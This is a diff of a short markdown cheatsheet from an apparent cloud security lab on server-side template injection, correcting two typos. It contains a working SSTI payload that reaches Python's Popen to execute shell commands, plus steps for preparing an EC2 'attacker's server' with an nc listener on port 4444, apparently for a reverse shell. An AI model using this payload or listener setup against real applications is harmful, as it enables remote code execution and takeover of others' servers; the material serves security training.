greyhawk16/CloudRudolf/4.SSTI/cheatsheet.md

-1. Acccess and exploit given web application with SSTI vulnerability
+1. Access and exploit given web application with SSTI vulnerability

     ```html
     <div>{{''.__class__.__mro__[1].__subclasses__()[349]('ls',shell=True,stdout=-1).communicate()}}</div>
     ```

-2. Prepare an EC2 instance which will serve as attaccker's server
+2. Prepare an EC2 instance which will serve as attacker's server
    - Allow TCP traffic from victim's server coming to port `4444` in Security group
    - open port `4444` using `nc`
    -  you may use other port instead of `4444`